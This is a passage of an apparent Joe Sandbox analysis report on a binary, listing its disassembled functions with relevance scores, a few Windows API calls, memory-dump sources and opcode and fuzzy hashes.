                                                                                                                                                                    • Opcode Fuzzy Hash: 1df655931d8d847b82ffe247cb2d3b305029c1c8937d4cacf8913cef6ceb3a81
                                                                                                                                                                    • Instruction Fuzzy Hash: 61710976A8050A8FDF04CEFCC9A13EF77F2AB97314F105915D8259B395C63A890A8B91
                                                                                                                                                                    Function 6E81019C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E810294
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E81029E
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6E8102AB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 3906539128-246349140
                                                                                                                                                                    • Opcode ID: 04012e461d60c65ceeefa1a66f314663f15748169e2bdaffeb1c6b083b5c84bc
                                                                                                                                                                    • Instruction ID: 2bbc1371046c258a685257503cd79cff5b665cdd288100c44ac9b9dc5defd0b3
                                                                                                                                                                    • Opcode Fuzzy Hash: 04012e461d60c65ceeefa1a66f314663f15748169e2bdaffeb1c6b083b5c84bc
                                                                                                                                                                    • Instruction Fuzzy Hash: 5931047091122D9BCB61DF68DD887CCBBB8BF08310F1046EAE81CA7290E7709B858F45
                                                                                                                                                                    Function 6E8010E0 Relevance: 6.7, Strings: 5, Instructions: 472COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: =M$N!"5$N!"5$zi2$}mH
                                                                                                                                                                    • API String ID: 0-1452745638
                                                                                                                                                                    • Opcode ID: 1a71a143ec24f8e0c1d4e3b319926c0c6da71d0da645d297715976dd6d4b7af5
                                                                                                                                                                    • Instruction ID: 5054375cde85ee7e590e66eeb9540eeb20f2d38315127d0f609089f54ec4b765
                                                                                                                                                                    • Opcode Fuzzy Hash: 1a71a143ec24f8e0c1d4e3b319926c0c6da71d0da645d297715976dd6d4b7af5
                                                                                                                                                                    • Instruction Fuzzy Hash: 45F10676A451098FCF04CEEDDA903DD7BF2AB4B368F204919D811E7394D63A9E0D8B15
                                                                                                                                                                    Function 6E80C1F2 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6E80C1FE
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6E80C2CA
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E80C2E3
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 6E80C2ED
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                    • Opcode ID: 2930f9150865b779cd2904f266a970b5454366dbe90d1bc71827c5482ee72cd6
                                                                                                                                                                    • Instruction ID: 2da508e8002a94766c6bc39abb124ddba285cc42ccccb4be3cbd54b7fbb67447
                                                                                                                                                                    • Opcode Fuzzy Hash: 2930f9150865b779cd2904f266a970b5454366dbe90d1bc71827c5482ee72cd6
                                                                                                                                                                    • Instruction Fuzzy Hash: 52312575D012199BDF60DFA4CD49BCDBBB8AF08304F1045AAE40DAB290EB709B84CF55
                                                                                                                                                                    Function 6E806A10 Relevance: 5.8, Strings: 4, Instructions: 819COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ?R$$^^p$^^p$}mH
                                                                                                                                                                    • API String ID: 0-3687332255
                                                                                                                                                                    • Opcode ID: c92ef6ed04b4a84ebb800353be8b34e1da272addf440e85f2db293516febef3c
                                                                                                                                                                    • Instruction ID: fb1d673ae2bdd735d9b31ed0390dfcf1319e61a328fc423ca4da08c30d4f0c7b
                                                                                                                                                                    • Opcode Fuzzy Hash: c92ef6ed04b4a84ebb800353be8b34e1da272addf440e85f2db293516febef3c
                                                                                                                                                                    • Instruction Fuzzy Hash: 1B52DF36F506098FCB04DEFDC9943CE7BF2AB46350F109919D825EB795C63AA90ACB41
                                                                                                                                                                    Function 6E805AC0 Relevance: 5.3, Strings: 4, Instructions: 298COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: sS2;$v)8d$v)8d$}mH
                                                                                                                                                                    • API String ID: 0-621835856
                                                                                                                                                                    • Opcode ID: 6362197ea445efe6d8251ca70e259ca0dd6babc3781acbbe443b3dd889036308
                                                                                                                                                                    • Instruction ID: 7e6048b220240fff228c4c7a151f2878e590b9ead866117c3655a08d7de471df
                                                                                                                                                                    • Opcode Fuzzy Hash: 6362197ea445efe6d8251ca70e259ca0dd6babc3781acbbe443b3dd889036308
                                                                                                                                                                    • Instruction Fuzzy Hash: 73A13A36A4060A8FDF14CFBCC9E57DE77E2AB47320F245A15D865EB3D0C62A5909CB60
                                                                                                                                                                    Function 6E804F10 Relevance: 4.0, Strings: 3, Instructions: 251COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: #h>$#h>$}mH
                                                                                                                                                                    • API String ID: 0-2102491416
                                                                                                                                                                    • Opcode ID: 15282cdbd1bd9a9b44b31bf689c3c6bc2654f2631aac1de1c3e92a49fc9ce5d0
                                                                                                                                                                    • Instruction ID: f977668e732438dafe4b4b5149dfd5014197fc31db1da6a33adf133ec0ae7bca
                                                                                                                                                                    • Opcode Fuzzy Hash: 15282cdbd1bd9a9b44b31bf689c3c6bc2654f2631aac1de1c3e92a49fc9ce5d0
                                                                                                                                                                    • Instruction Fuzzy Hash: BE81F475E406168FCF04CFFCC8A53DE7BF2AB5A321F115919D911EB391C62A490ACBA4
                                                                                                                                                                    Function 6E8120ED Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 140COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: 72c862ba112c015c5ee73f8427531a7b0f4517527b6d64706f1756d6861ebb2e
                                                                                                                                                                    • Instruction ID: 3939b7925ce05488cf0b0bdcbfca324675ec3daa5a15b9d41ffbb5ea7e77397a
                                                                                                                                                                    • Opcode Fuzzy Hash: 72c862ba112c015c5ee73f8427531a7b0f4517527b6d64706f1756d6861ebb2e
                                                                                                                                                                    • Instruction Fuzzy Hash: 464191B590821AAFDB50DFA9CC88AEABBB9EB45304F1446DDE41DD3240DB349E84DF50
                                                                                                                                                                    Function 6E8084F0 Relevance: 2.9, Strings: 2, Instructions: 427COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 2]<8$2]<8
                                                                                                                                                                    • API String ID: 0-4277245287
                                                                                                                                                                    • Opcode ID: 8a369a9bc58db7da8dc6de8fbfb572088701298c7ff6ea88678626818fb0d342
                                                                                                                                                                    • Instruction ID: 04631081cdf1669dc3c455c1bf4649e60fec5757b50887e526eca0f70cd831c5
                                                                                                                                                                    • Opcode Fuzzy Hash: 8a369a9bc58db7da8dc6de8fbfb572088701298c7ff6ea88678626818fb0d342
                                                                                                                                                                    • Instruction Fuzzy Hash: F9E1F372A45109DFCB04CFFDEEA57DD7BF2AB46350F105A16E825E7384D72989888B01
                                                                                                                                                                    Function 6E809560 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: Unknown exception$}mH
                                                                                                                                                                    • API String ID: 0-3621796645
                                                                                                                                                                    • Opcode ID: d1d086ce21114200fea2d2da1adc755364bb9b76f0f466204839eddfae236cab
                                                                                                                                                                    • Instruction ID: 1ff66eda8cfec4e53ef095403c3ea6a3069b019d0bcc9fcbf7927029438b91c6
                                                                                                                                                                    • Opcode Fuzzy Hash: d1d086ce21114200fea2d2da1adc755364bb9b76f0f466204839eddfae236cab
                                                                                                                                                                    • Instruction Fuzzy Hash: 06C10576E406098FCF04CEFDD9A57CE7BF2AB8A311F109919D421E77A4C62A9809CF51
                                                                                                                                                                    Function 6E806550 Relevance: 2.8, Strings: 2, Instructions: 306COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: AM|$AM|
                                                                                                                                                                    • API String ID: 0-2112996108
                                                                                                                                                                    • Opcode ID: 374058d4cb57a359c1705f2956a9cedd11224bb4f88026da16632eb22c2f51be
                                                                                                                                                                    • Instruction ID: adfadda29a3ad05ceff0b1fd12522be33ceecb34bf72ba6c2000f11ac5e9a024
                                                                                                                                                                    • Opcode Fuzzy Hash: 374058d4cb57a359c1705f2956a9cedd11224bb4f88026da16632eb22c2f51be
                                                                                                                                                                    • Instruction Fuzzy Hash: 2BA12676A6411A8FCF04CEFCCD917DE77F2BB46320F106A19D821E7B84C62A9949DB10
                                                                                                                                                                    Function 6E8017D0 Relevance: 2.8, Strings: 2, Instructions: 268COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH$QB
                                                                                                                                                                    • API String ID: 0-1228090609
                                                                                                                                                                    • Opcode ID: e9a569e0119274dc18c7c45c62458e9020e64dae76497ecfe4710fe486816779
                                                                                                                                                                    • Instruction ID: 1c1c06a86722963387b876a4eac5fe3279389516204b2bf076fc1f4a28fe3f35
                                                                                                                                                                    • Opcode Fuzzy Hash: e9a569e0119274dc18c7c45c62458e9020e64dae76497ecfe4710fe486816779
                                                                                                                                                                    • Instruction Fuzzy Hash: 6991D176E002188FCB04CFFDD9956DEBBF2AB4A328F104A19D816EB350D6359909CF51
                                                                                                                                                                    Function 6E802A00 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: @B_a$}mH
                                                                                                                                                                    • API String ID: 0-313790564
                                                                                                                                                                    • Opcode ID: 582cda309efb258e6b1aaf0bb7d34c33acfe504528ea93cf96d78c8a9d8ec598
                                                                                                                                                                    • Instruction ID: 408b62334e72f3d070bed2f7a63850a931474271f876bd3614ac695b96aa2f28
                                                                                                                                                                    • Opcode Fuzzy Hash: 582cda309efb258e6b1aaf0bb7d34c33acfe504528ea93cf96d78c8a9d8ec598
                                                                                                                                                                    • Instruction Fuzzy Hash: 7241E535E406098FCF05CEBDC9A07DE7BF6AB4A320F105659D824AB3A6C6799905CF50
                                                                                                                                                                    Function 6E807890 Relevance: 1.9, Strings: 1, Instructions: 689COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: ba7a2876832d6d6d073fdfb4c593c4d9843fb48d774a8a76fc6f44a4c74fd3e0
                                                                                                                                                                    • Instruction ID: effebaba2fd5a4a0b51b964cd168beb6ac600862c90b1da81d374e83a8e073c1
                                                                                                                                                                    • Opcode Fuzzy Hash: ba7a2876832d6d6d073fdfb4c593c4d9843fb48d774a8a76fc6f44a4c74fd3e0
                                                                                                                                                                    • Instruction Fuzzy Hash: 4E320576A9450A8FCF04CEFDD9E57DE77F2AB56310F205919E821EB394C636990ACB00
                                                                                                                                                                    Function 6E803B40 Relevance: 1.9, Strings: 1, Instructions: 661COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: 5a5dc9d4b1aa9136a3d400f37fb74c819202c70ae6a9c0d8e7bc4624953a21ba
                                                                                                                                                                    • Instruction ID: 938e843d865b5d327e8a62b60193222c3a881714640d36b658c996208bd795c3
                                                                                                                                                                    • Opcode Fuzzy Hash: 5a5dc9d4b1aa9136a3d400f37fb74c819202c70ae6a9c0d8e7bc4624953a21ba
                                                                                                                                                                    • Instruction Fuzzy Hash: 6C328CB5A446098FCB04CFECEA95ADEBBF2BB8A314F004929E815EB355D7359C05CB41
                                                                                                                                                                    Function 6E7F8CC0 Relevance: 1.9, Strings: 1, Instructions: 661COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: 3ab63b98279428e9f798389d004a850a44ed1312cab7b9d9ac80d70baaaa676f
                                                                                                                                                                    • Instruction ID: dff9589151ea113881feba1d8d066a160b5fa50a6e845c8c7666b22b604b722c
                                                                                                                                                                    • Opcode Fuzzy Hash: 3ab63b98279428e9f798389d004a850a44ed1312cab7b9d9ac80d70baaaa676f
                                                                                                                                                                    • Instruction Fuzzy Hash: 39328C75A44205CFDB44CFEEC6D47DD7BF2AB5A314F20422AD8199B3A9C636990ACF01
                                                                                                                                                                    Function 6E818515 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E818510,?,?,00000008,?,?,6E818113,00000000), ref: 6E818742
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
